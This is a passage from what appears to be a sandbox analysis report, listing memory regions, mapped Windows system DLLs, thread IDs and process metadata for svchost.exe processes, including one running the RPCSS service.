"pagefile_0x0000000864ce0000" filename = "" Region: id = 14027 start_va = 0x864cf0000 end_va = 0x864cf6fff entry_point = 0x0 region_type = private name = "private_0x0000000864cf0000" filename = "" Region: id = 14028 start_va = 0x864d00000 end_va = 0x864dfffff entry_point = 0x0 region_type = private name = "private_0x0000000864d00000" filename = "" Region: id = 14029 start_va = 0x864e00000 end_va = 0x864efffff entry_point = 0x0 region_type = private name = "private_0x0000000864e00000" filename = "" Region: id = 14030 start_va = 0x864f00000 end_va = 0x864f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000864f00000" filename = "" Region: id = 14031 start_va = 0x864f80000 end_va = 0x864ffffff entry_point = 0x0 region_type = private name = "private_0x0000000864f80000" filename = "" Region: id = 14032 start_va = 0x865000000 end_va = 0x865002fff entry_point = 0x865000000 region_type = mapped_file name = "lsm.dll.mui" filename = "\\Windows\\System32\\en-US\\lsm.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\lsm.dll.mui") Region: id = 14033 start_va = 0x865010000 end_va = 0x865016fff entry_point = 0x0 region_type = private name = "private_0x0000000865010000" filename = "" Region: id = 14034 start_va = 0x865020000 end_va = 0x86509ffff entry_point = 0x0 region_type = private name = "private_0x0000000865020000" filename = "" Region: id = 14035 start_va = 0x8650a0000 end_va = 0x8650a0fff entry_point = 0x8650a0000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 14036 start_va = 0x8650b0000 end_va = 0x8650b0fff entry_point = 0x0 region_type = private name = "private_0x00000008650b0000" filename = "" Region: id = 14037 start_va = 0x8650c0000 end_va = 0x8650c0fff entry_point = 0x0 region_type = private name = "private_0x00000008650c0000" filename = "" Region: id = 14038 start_va = 0x8650d0000 end_va = 0x8650d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008650d0000" filename = "" Region: id = 14039 start_va = 0x8650e0000 end_va = 0x8650e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000008650e0000" filename = "" Region: id = 14040 start_va = 0x865100000 end_va = 0x8651fffff entry_point = 0x0 region_type = private name = "private_0x0000000865100000" filename = "" Region: id = 14041 start_va = 0x865200000 end_va = 0x8652fffff entry_point = 0x0 region_type = private name = "private_0x0000000865200000" filename = "" Region: id = 14042 start_va = 0x865300000 end_va = 0x8653fffff entry_point = 0x0 region_type = private name = "private_0x0000000865300000" filename = "" Region: id = 14043 start_va = 0x865400000 end_va = 0x86547ffff entry_point = 0x0 region_type = private name = "private_0x0000000865400000" filename = "" Region: id = 14044 start_va = 0x865480000 end_va = 0x8654fffff entry_point = 0x0 region_type = private name = "private_0x0000000865480000" filename = "" Region: id = 14045 start_va = 0x865500000 end_va = 0x8655fffff entry_point = 0x0 region_type = private name = "private_0x0000000865500000" filename = "" Region: id = 14046 start_va = 0x865600000 end_va = 0x8656fffff entry_point = 0x0 region_type = private name = "private_0x0000000865600000" filename = "" Region: id = 14047 start_va = 0x865700000 end_va = 0x86577ffff entry_point = 0x0 region_type = private name = "private_0x0000000865700000" filename = "" Region: id = 14048 start_va = 0x865780000 end_va = 0x865786fff entry_point = 0x0 region_type = private name = "private_0x0000000865780000" filename = "" Region: id = 14049 start_va = 0x865790000 end_va = 0x8657b9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000865790000" filename = "" Region: id = 14050 start_va = 0x865800000 end_va = 0x8658fffff entry_point = 0x0 region_type = private name = "private_0x0000000865800000" filename = "" Region: id = 14051 start_va = 0x865900000 end_va = 0x8659fffff entry_point = 0x0 region_type = private name = "private_0x0000000865900000" filename = "" Region: id = 14052 start_va = 0x865a00000 end_va = 0x865d36fff entry_point = 0x865a00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 14053 start_va = 0x865d40000 end_va = 0x865e3ffff entry_point = 0x0 region_type = private name = "private_0x0000000865d40000" filename = "" Region: id = 14054 start_va = 0x865e40000 end_va = 0x865f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000865e40000" filename = "" Region: id = 14055 start_va = 0x865f40000 end_va = 0x86603ffff entry_point = 0x0 region_type = private name = "private_0x0000000865f40000" filename = "" Region: id = 14056 start_va = 0x866040000 end_va = 0x8660fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000866040000" filename = "" Region: id = 14057 start_va = 0x866100000 end_va = 0x8661fffff entry_point = 0x0 region_type = private name = "private_0x0000000866100000" filename = "" Region: id = 14058 start_va = 0x866200000 end_va = 0x8662fffff entry_point = 0x0 region_type = private name = "private_0x0000000866200000" filename = "" Region: id = 14059 start_va = 0x866300000 end_va = 0x8663fffff entry_point = 0x0 region_type = private name = "private_0x0000000866300000" filename = "" Region: id = 14060 start_va = 0x866400000 end_va = 0x866587fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000866400000" filename = "" Region: id = 14061 start_va = 0x866590000 end_va = 0x866710fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000866590000" filename = "" Region: id = 14062 start_va = 0x866720000 end_va = 0x86681ffff entry_point = 0x0 region_type = private name = "private_0x0000000866720000" filename = "" Region: id = 14063 start_va = 0x866820000 end_va = 0x86691ffff entry_point = 0x0 region_type = private name = "private_0x0000000866820000" filename = "" Region: id = 14064 start_va = 0x866a20000 end_va = 0x866a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000866a20000" filename = "" Region: id = 14065 start_va = 0x866aa0000 end_va = 0x866b1ffff entry_point = 0x0 region_type = private name = "private_0x0000000866aa0000" filename = "" Region: id = 14066 start_va = 0x7df5ff6a0000 end_va = 0x7ff5ff69ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6a0000" filename = "" Region: id = 14067 start_va = 0x7ff7b300c000 end_va = 0x7ff7b300dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b300c000" filename = "" Region: id = 14068 start_va = 0x7ff7b300e000 end_va = 0x7ff7b300ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b300e000" filename = "" Region: id = 14069 start_va = 0x7ff7b3014000 end_va = 0x7ff7b3015fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3014000" filename = "" Region: id = 14070 start_va = 0x7ff7b3016000 end_va = 0x7ff7b3017fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3016000" filename = "" Region: id = 14071 start_va = 0x7ff7b3018000 end_va = 0x7ff7b3019fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3018000" filename = "" Region: id = 14072 start_va = 0x7ff7b301a000 end_va = 0x7ff7b301bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b301a000" filename = "" Region: id = 14073 start_va = 0x7ff7b301c000 end_va = 0x7ff7b301dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b301c000" filename = "" Region: id = 14074 start_va = 0x7ff7b301e000 end_va = 0x7ff7b301ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b301e000" filename = "" Region: id = 14075 start_va = 0x7ff7b3020000 end_va = 0x7ff7b3021fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3020000" filename = "" Region: id = 14076 start_va = 0x7ff7b3022000 end_va = 0x7ff7b3023fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3022000" filename = "" Region: id = 14077 start_va = 0x7ff7b3024000 end_va = 0x7ff7b3025fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3024000" filename = "" Region: id = 14078 start_va = 0x7ff7b3026000 end_va = 0x7ff7b3027fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3026000" filename = "" Region: id = 14079 start_va = 0x7ff7b3028000 end_va = 0x7ff7b3029fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3028000" filename = "" Region: id = 14080 start_va = 0x7ff7b302a000 end_va = 0x7ff7b302bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b302a000" filename = "" Region: id = 14081 start_va = 0x7ff7b302c000 end_va = 0x7ff7b302dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b302c000" filename = "" Region: id = 14082 start_va = 0x7ff7b302e000 end_va = 0x7ff7b302ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b302e000" filename = "" Region: id = 14083 start_va = 0x7ff7b3030000 end_va = 0x7ff7b312ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3030000" filename = "" Region: id = 14084 start_va = 0x7ff7b3130000 end_va = 0x7ff7b3152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7b3130000" filename = "" Region: id = 14085 start_va = 0x7ff7b3153000 end_va = 0x7ff7b3154fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3153000" filename = "" Region: id = 14086 start_va = 0x7ff7b3155000 end_va = 0x7ff7b3156fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3155000" filename = "" Region: id = 14087 start_va = 0x7ff7b3157000 end_va = 0x7ff7b3158fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3157000" filename = "" Region: id = 14088 start_va = 0x7ff7b3159000 end_va = 0x7ff7b3159fff entry_point = 0x0 region_type = private name = "private_0x00007ff7b3159000" filename = "" Region: id = 14089 start_va = 0x7ff7b315a000 end_va = 0x7ff7b315bfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b315a000" filename = "" Region: id = 14090 start_va = 0x7ff7b315c000 end_va = 0x7ff7b315dfff entry_point = 0x0 region_type = private name = "private_0x00007ff7b315c000" filename = "" Region: id = 14091 start_va = 0x7ff7b315e000 end_va = 0x7ff7b315ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7b315e000" filename = "" Region: id = 14092 start_va = 0x7ff7b3dc0000 end_va = 0x7ff7b3dccfff entry_point = 0x7ff7b3dc0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 14093 start_va = 0x7ffbf4cc0000 end_va = 0x7ffbf4cd5fff entry_point = 0x7ffbf4cc0000 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 14094 start_va = 0x7ffbf4ce0000 end_va = 0x7ffbf4cebfff entry_point = 0x7ffbf4ce0000 region_type = mapped_file name = "licensemanagerapi.dll" filename = "\\Windows\\System32\\LicenseManagerApi.dll" (normalized: "c:\\windows\\system32\\licensemanagerapi.dll") Region: id = 14095 start_va = 0x7ffbf4fd0000 end_va = 0x7ffbf4fe4fff entry_point = 0x7ffbf4fd0000 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 14096 start_va = 0x7ffbf50d0000 end_va = 0x7ffbf50ddfff entry_point = 0x7ffbf50d0000 region_type = mapped_file name = "sebbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\SebBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\sebbackgroundmanagerpolicy.dll") Region: id = 14097 start_va = 0x7ffbf50e0000 end_va = 0x7ffbf50f7fff entry_point = 0x7ffbf50e0000 region_type = mapped_file name = "windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\Windows.Networking.BackgroundTransfer.BackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll") Region: id = 14098 start_va = 0x7ffbf5100000 end_va = 0x7ffbf5116fff entry_point = 0x7ffbf5100000 region_type = mapped_file name = "acpbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\ACPBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\acpbackgroundmanagerpolicy.dll") Region: id = 14099 start_va = 0x7ffbf5120000 end_va = 0x7ffbf512bfff entry_point = 0x7ffbf5120000 region_type = mapped_file name = "cbtbackgroundmanagerpolicy.dll" filename = "\\Windows\\System32\\CbtBackgroundManagerPolicy.dll" (normalized: "c:\\windows\\system32\\cbtbackgroundmanagerpolicy.dll") Region: id = 14100 start_va = 0x7ffbf5130000 end_va = 0x7ffbf513ffff entry_point = 0x7ffbf5130000 region_type = mapped_file name = "backgroundmediapolicy.dll" filename = "\\Windows\\System32\\BackgroundMediaPolicy.dll" (normalized: "c:\\windows\\system32\\backgroundmediapolicy.dll") Region: id = 14101 start_va = 0x7ffbf5200000 end_va = 0x7ffbf5242fff entry_point = 0x7ffbf5200000 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 14102 start_va = 0x7ffbf5460000 end_va = 0x7ffbf58c9fff entry_point = 0x7ffbf5460000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 14103 start_va = 0x7ffbfba50000 end_va = 0x7ffbfbae1fff entry_point = 0x7ffbfba50000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 14104 start_va = 0x7ffbfd180000 end_va = 0x7ffbfd18ffff entry_point = 0x7ffbfd180000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 14105 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 14106 start_va = 0x7ffbfd740000 end_va = 0x7ffbfd7b1fff entry_point = 0x7ffbfd740000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 14107 start_va = 0x7ffbfdbe0000 end_va = 0x7ffbfdbebfff entry_point = 0x7ffbfdbe0000 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 14108 start_va = 0x7ffbfe5c0000 end_va = 0x7ffbfe5d2fff entry_point = 0x7ffbfe5c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 14109 start_va = 0x7ffbfeaf0000 end_va = 0x7ffbfeb10fff entry_point = 0x7ffbfeaf0000 region_type = mapped_file name = "dab.dll" filename = "\\Windows\\System32\\dab.dll" (normalized: "c:\\windows\\system32\\dab.dll") Region: id = 14110 start_va = 0x7ffbfeb20000 end_va = 0x7ffbfeb5efff entry_point = 0x7ffbfeb20000 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 14111 start_va = 0x7ffbfeb60000 end_va = 0x7ffbfebc1fff entry_point = 0x7ffbfeb60000 region_type = mapped_file name = "systemeventsbrokerserver.dll" filename = "\\Windows\\System32\\SystemEventsBrokerServer.dll" (normalized: "c:\\windows\\system32\\systemeventsbrokerserver.dll") Region: id = 14112 start_va = 0x7ffbfec30000 end_va = 0x7ffbfecf7fff entry_point = 0x7ffbfec30000 region_type = mapped_file name = "coremessaging.dll" filename = "\\Windows\\System32\\CoreMessaging.dll" (normalized: "c:\\windows\\system32\\coremessaging.dll") Region: id = 14113 start_va = 0x7ffbff210000 end_va = 0x7ffbff236fff entry_point = 0x7ffbff210000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 14114 start_va = 0x7ffbff260000 end_va = 0x7ffbff34dfff entry_point = 0x7ffbff260000 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 14115 start_va = 0x7ffbff350000 end_va = 0x7ffbff3d3fff entry_point = 0x7ffbff350000 region_type = mapped_file name = "psmserviceexthost.dll" filename = "\\Windows\\System32\\PsmServiceExtHost.dll" (normalized: "c:\\windows\\system32\\psmserviceexthost.dll") Region: id = 14116 start_va = 0x7ffbff3e0000 end_va = 0x7ffbff3e8fff entry_point = 0x7ffbff3e0000 region_type = mapped_file name = "wmsgapi.dll" filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll") Region: id = 14117 start_va = 0x7ffbff3f0000 end_va = 0x7ffbff3fbfff entry_point = 0x7ffbff3f0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 14118 start_va = 0x7ffbff400000 end_va = 0x7ffbff4c0fff entry_point = 0x7ffbff400000 region_type = mapped_file name = "lsm.dll" filename = "\\Windows\\System32\\lsm.dll" (normalized: "c:\\windows\\system32\\lsm.dll") Region: id = 14119 start_va = 0x7ffbff4d0000 end_va = 0x7ffbff4f7fff entry_point = 0x7ffbff4d0000 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 14120 start_va = 0x7ffbff500000 end_va = 0x7ffbff531fff entry_point = 0x7ffbff500000 region_type = mapped_file name = "psmsrv.dll" filename = "\\Windows\\System32\\psmsrv.dll" (normalized: "c:\\windows\\system32\\psmsrv.dll") Region: id = 14121 start_va = 0x7ffbff540000 end_va = 0x7ffbff5c5fff entry_point = 0x7ffbff540000 region_type = mapped_file name = "bisrv.dll" filename = "\\Windows\\System32\\bisrv.dll" (normalized: "c:\\windows\\system32\\bisrv.dll") Region: id = 14122 start_va = 0x7ffbff6e0000 end_va = 0x7ffbff7bafff entry_point = 0x7ffbff6e0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 14123 start_va = 0x7ffbff7c0000 end_va = 0x7ffbff7e2fff entry_point = 0x7ffbff7c0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 14124 start_va = 0x7ffbff7f0000 end_va = 0x7ffbff8e7fff entry_point = 0x7ffbff7f0000 region_type = mapped_file name = "tdh.dll" filename = "\\Windows\\System32\\tdh.dll" (normalized: "c:\\windows\\system32\\tdh.dll") Region: id = 14125 start_va = 0x7ffbff8f0000 end_va = 0x7ffbff8fbfff entry_point = 0x7ffbff8f0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 14126 start_va = 0x7ffbff900000 end_va = 0x7ffbff915fff entry_point = 0x7ffbff900000 region_type = mapped_file name = "umpoext.dll" filename = "\\Windows\\System32\\umpoext.dll" (normalized: "c:\\windows\\system32\\umpoext.dll") Region: id = 14127 start_va = 0x7ffbff920000 end_va = 0x7ffbff93afff entry_point = 0x7ffbff920000 region_type = mapped_file name = "umpo.dll" filename = "\\Windows\\System32\\umpo.dll" (normalized: "c:\\windows\\system32\\umpo.dll") Region: id = 14128 start_va = 0x7ffbff940000 end_va = 0x7ffbff95ffff entry_point = 0x7ffbff940000 region_type = mapped_file name = "umpnpmgr.dll" filename = "\\Windows\\System32\\umpnpmgr.dll" (normalized: "c:\\windows\\system32\\umpnpmgr.dll") Region: id = 14129 start_va = 0x7ffbffd20000 end_va = 0x7ffbffd77fff entry_point = 0x7ffbffd20000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 14130 start_va = 0x7ffbffdc0000 end_va = 0x7ffbffdf2fff entry_point = 0x7ffbffdc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 14131 start_va = 0x7ffbffeb0000 end_va = 0x7ffbffecefff entry_point = 0x7ffbffeb0000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 14132 start_va = 0x7ffc00170000 end_va = 0x7ffc00186fff entry_point = 0x7ffc00170000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 14133 start_va = 0x7ffc002e0000 end_va = 0x7ffc002eafff entry_point = 0x7ffc002e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 14134 start_va = 0x7ffc004c0000 end_va = 0x7ffc004ebfff entry_point = 0x7ffc004c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 14135 start_va = 0x7ffc00690000 end_va = 0x7ffc006a9fff entry_point = 0x7ffc00690000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 14136 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 14137 start_va = 0x7ffc006f0000 end_va = 0x7ffc0075afff entry_point = 0x7ffc006f0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 14138 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 14139 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 14140 start_va = 0x7ffc00910000 end_va = 0x7ffc0091efff entry_point = 0x7ffc00910000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 14141 start_va = 0x7ffc00f70000 end_va = 0x7ffc00fb3fff entry_point = 0x7ffc00f70000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 14142 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14143 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 14144 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14145 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 14146 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14147 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14148 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14149 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14150 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14151 start_va = 0x7ffc03b40000 end_va = 0x7ffc03baefff entry_point = 0x7ffc03b40000 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 14152 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 14153 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 14154 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14155 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 1175 os_tid = 0xe40 Thread: id = 1176 os_tid = 0x990 Thread: id = 1177 os_tid = 0x828 Thread: id = 1178 os_tid = 0x96c Thread: id = 1179 os_tid = 0x684 Thread: id = 1180 os_tid = 0x4d8 Thread: id = 1181 os_tid = 0x4a4 Thread: id = 1182 os_tid = 0x46c Thread: id = 1183 os_tid = 0x5d4 Thread: id = 1184 os_tid = 0x5d0 Thread: id = 1185 os_tid = 0x3f0 Thread: id = 1186 os_tid = 0x3e0 Thread: id = 1187 os_tid = 0x314 Thread: id = 1188 os_tid = 0x304 Thread: id = 1189 os_tid = 0x2e8 Thread: id = 1190 os_tid = 0x2e4 Thread: id = 1191 os_tid = 0x2b0 Thread: id = 1192 os_tid = 0x2ac Thread: id = 1193 os_tid = 0x288 Thread: id = 1194 os_tid = 0x270 Thread: id = 1195 os_tid = 0x25c Thread: id = 1196 os_tid = 0x24c Thread: id = 1398 os_tid = 0xe30 Process: id = "282" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x28780000" os_pid = "0x268" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "280" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:00008f31" [0xc000000f], "LOCAL" [0x7] Region: id = 13934 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13935 start_va = 0x4a64a20000 end_va = 0x4a64a2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a64a20000" filename = "" Region: id = 13936 start_va = 0x4a64a30000 end_va = 0x4a64a32fff entry_point = 0x4a64a30000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 13937 start_va = 0x4a64a40000 end_va = 0x4a64a53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a64a40000" filename = "" Region: id = 13938 start_va = 0x4a64a60000 end_va = 0x4a64adffff entry_point = 0x0 region_type = private name = "private_0x0000004a64a60000" filename = "" Region: id = 13939 start_va = 0x4a64ae0000 end_va = 0x4a64ae3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a64ae0000" filename = "" Region: id = 13940 start_va = 0x4a64af0000 end_va = 0x4a64af0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a64af0000" filename = "" Region: id = 13941 start_va = 0x4a64b00000 end_va = 0x4a64b01fff entry_point = 0x0 